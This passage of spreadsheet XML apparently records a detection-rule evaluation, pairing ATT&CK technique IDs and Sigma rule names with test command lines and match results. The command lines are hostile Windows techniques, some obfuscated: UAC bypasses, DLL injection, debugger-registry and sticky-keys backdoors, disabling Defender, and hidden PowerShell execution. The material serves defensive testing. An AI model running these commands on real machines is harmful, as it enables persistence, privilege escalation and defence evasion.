      </c>
      <c r="F403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G403" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H403" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I403" s="43" t="n"/>
      <c r="J403" s="43" t="n"/>
      <c r="K403" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B404" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C404" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D404" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E404" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmstp.exe /^s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" /^a^u"</t>
        </is>
      </c>
      <c r="F404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I404" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J404" s="43" t="n"/>
      <c r="K404" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B405" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C405" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D405" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E405" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "netsh.exe ad^d helper "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll""</t>
        </is>
      </c>
      <c r="F405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I405" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J405" s="43" t="n"/>
      <c r="K405" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B406" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C406" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D406" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E406" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\rundll32.exe" -st^a {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I406" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects (f1edd233-30b5-4823-9e6a-c4171b24d316); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J406" s="43" t="n"/>
      <c r="K406" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B407" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C407" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D407" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E407" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I407" s="43" t="n"/>
      <c r="J407" s="43" t="n"/>
      <c r="K407" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B408" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C408" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D408" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E408" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 /"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I408" s="43" t="n"/>
      <c r="J408" s="43" t="n"/>
      <c r="K408" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B409" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C409" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D409" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E409" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I409" s="43" t="n"/>
      <c r="J409" s="43" t="n"/>
      <c r="K409" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
      <c r="A410" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B410" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C410" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D410" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E410" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INjectRUNNInG\Tc:\TemP\Evil.DlL</t>
        </is>
      </c>
      <c r="F410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I410" s="43" t="n"/>
      <c r="J410" s="43" t="n"/>
      <c r="K410" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B411" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C411" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D411" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E411" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 -"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="43" t="n"/>
      <c r="K411" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B412" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C412" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D412" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E412" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /InJeCTruNNinG\TC:\temP\EVil.DLL</t>
        </is>
      </c>
      <c r="F412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I412" s="43" t="n"/>
      <c r="J412" s="43" t="n"/>
      <c r="K412" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B413" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C413" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D413" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E413" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "cmd.exe"  /Run</t>
        </is>
      </c>
      <c r="F413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I413" s="43" t="n"/>
      <c r="J413" s="43" t="n"/>
      <c r="K413" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B414" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C414" s="43" t="inlineStr">
        <is>
          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D414" s="43" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E414" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$input_table = "osk.""exe, sethc.""exe, utilman.""exe, magnify.""exe, narrator.""exe, DisplaySwitch.""exe, atbroker.""exe".split(",")
$Name = "Debugger"
$Value = "C:\windows\system32\cmd.exe"
Foreach ($item in $input_table){
  $item = $item.trim() -replace '""',''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F414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H414" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I414" s="43" t="n"/>
      <c r="J414" s="43" t="n"/>
      <c r="K414" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B415" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C415" s="43" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D415" s="43" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E415" s="43" t="inlineStr">
        <is>
          <t>cmd /c mklink %windir%\System32\osk.exe %windir%\System32\cmd."","exe</t>
        </is>
      </c>
      <c r="F415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H415" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I415" s="43" t="n"/>
      <c r="J415" s="43" t="n"/>
      <c r="K415" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B416" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C416" s="43" t="inlineStr">
        <is>
          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D416" s="43" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E416" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$input_table = "osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe".split(",")
$Name = "Debugger"
$Value = "C:\windows\system32\cmd.exe"
Foreach ($item in $input_table){
  $item = $item.trim()
  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
  IF(!(Test-Path $registryPath))
  {
    New-Item -Path $registryPath -Force
    New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
  }
  ELSE
  {
    New-ItemProperty -Path $registryPath -Name $name -Value $Value
  }
}}</t>
        </is>
      </c>
      <c r="F416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H416" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I416" s="43" t="n"/>
      <c r="J416" s="43" t="n"/>
      <c r="K416" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B417" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C417" s="43" t="inlineStr">
        <is>
          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D417" s="43" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E417" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$input_table = @('osk','sethc','utilman','magnify','narrator','DisplaySwitch','atbroker') | ForEach-Object { "$_`Reference".Replace('Reference','.exe') }
$Name = "Debugger"
$Value = "C:\windows\system32\cmd.exe"
Foreach ($item in $input_table){
  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
  New-Item -Path $registryPath -Force -ErrorAction Ignore
  New-ItemProperty -Path $registryPath -Name $Name -Value $Value -Force
}}</t>
        </is>
      </c>
      <c r="F417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H417" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I417" s="43" t="n"/>
      <c r="J417" s="43" t="n"/>
      <c r="K417" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B418" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C418" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D418" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E418" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c copy "/y" C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe</t>
        </is>
      </c>
      <c r="F418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I418" s="43" t="n"/>
      <c r="J418" s="43" t="n"/>
      <c r="K418" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B419" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C419" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D419" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E419" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c copy /Y "C:\Windows\System32\cmd.exe" "C:\Windows\System32\sethc.exe"</t>
        </is>
      </c>
      <c r="F419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I419" s="43" t="n"/>
      <c r="J419" s="43" t="n"/>
      <c r="K419" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B420" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C420" s="43" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D420" s="43" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E420" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^opy /y %SystemRoot%\System32\cmd.exe %SystemRoot%\System32\sethc.exe</t>
        </is>
      </c>
      <c r="F420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="43" t="n"/>
      <c r="J420" s="43" t="n"/>
      <c r="K420" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B421" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C421" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D421" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E421" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" /localserver {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I421" s="43" t="n"/>
      <c r="J421" s="43" t="n"/>
      <c r="K421" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="43" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B422" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C422" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D422" s="43" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E422" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" "-sta "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I422" s="43" t="n"/>
      <c r="J422" s="43" t="n"/>
      <c r="K422" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B423" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C423" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D423" s="43" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E423" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe  /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs  8 /Run</t>
        </is>
      </c>
      <c r="F423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I423" s="43" t="n"/>
      <c r="J423" s="43" t="n"/>
      <c r="K423" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="424" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="41" t="n"/>
      <c r="B424" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mssql_veaam_susp_child_processes</t>
        </is>
      </c>
      <c r="C424" s="41" t="inlineStr">
        <is>
          <t>Suspicious Child Process Of Veeam Dabatase</t>
        </is>
      </c>
      <c r="D424" s="41" t="inlineStr">
        <is>
          <t>d55b793d-f847-4eea-b59a-5ab09908ac90</t>
        </is>
      </c>
      <c r="E424" s="41" t="n"/>
      <c r="F424" s="41" t="n"/>
      <c r="G424" s="41" t="n"/>
      <c r="H424" s="41" t="n"/>
      <c r="I424" s="41" t="n"/>
      <c r="J424" s="41" t="n"/>
      <c r="K424" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="41" t="n"/>
      <c r="B425" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C425" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D425" s="41" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E425" s="41" t="n"/>
      <c r="F425" s="41" t="n"/>
      <c r="G425" s="41" t="n"/>
      <c r="H425" s="41" t="n"/>
      <c r="I425" s="41" t="n"/>
      <c r="J425" s="41" t="n"/>
      <c r="K425" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="41" t="n"/>
      <c r="B426" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_eventvwr_recentviews</t>
        </is>
      </c>
      <c r="C426" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using Event Viewer RecentViews</t>
        </is>
      </c>
      <c r="D426" s="41" t="inlineStr">
        <is>
          <t>30fc8de7-d833-40c4-96b6-28319fbc4f6c</t>
        </is>
      </c>
      <c r="E426" s="41" t="n"/>
      <c r="F426" s="41" t="n"/>
      <c r="G426" s="41" t="n"/>
      <c r="H426" s="41" t="n"/>
      <c r="I426" s="41" t="n"/>
      <c r="J426" s="41" t="n"/>
      <c r="K426" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="41" t="n"/>
      <c r="B427" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_msconfig_gui</t>
        </is>
      </c>
      <c r="C427" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using MSConfig Token Modification - Process</t>
        </is>
      </c>
      <c r="D427" s="41" t="inlineStr">
        <is>
          <t>ad92e3f9-7eb6-460e-96b1-582b0ccbb980</t>
        </is>
      </c>
      <c r="E427" s="41" t="n"/>
      <c r="F427" s="41" t="n"/>
      <c r="G427" s="41" t="n"/>
      <c r="H427" s="41" t="n"/>
      <c r="I427" s="41" t="n"/>
      <c r="J427" s="41" t="n"/>
      <c r="K427" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="41" t="n"/>
      <c r="B428" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C428" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D428" s="41" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E428" s="41" t="n"/>
      <c r="F428" s="41" t="n"/>
      <c r="G428" s="41" t="n"/>
      <c r="H428" s="41" t="n"/>
      <c r="I428" s="41" t="n"/>
      <c r="J428" s="41" t="n"/>
      <c r="K428" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="41" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B429" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C429" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D429" s="41" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E429" s="41" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F429" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G429" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H429" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I429" s="41" t="n"/>
      <c r="J429" s="41" t="n"/>
      <c r="K429" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B430" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C430" s="41" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D430" s="41" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E430" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command "$x=$((Get-ItemProperty HKCU:Software\Microsoft\WindowsUpdate).Update); Invoke-Expression $x"</t>
        </is>
      </c>
      <c r="F430" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G430" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H430" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I430" s="41" t="n"/>
      <c r="J430" s="41" t="n"/>
      <c r="K430" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B431" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C431" s="41" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D431" s="41" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E431" s="41" t="inlineStr">
        <is>
          <t>powershell.exe  -NoP  -NonI  -w  Hidden  -c  $x=$((gp  HKCU:Software\Microsoft\Windows Update).Update)</t>
        </is>
      </c>
      <c r="F431" s="41" t="b">
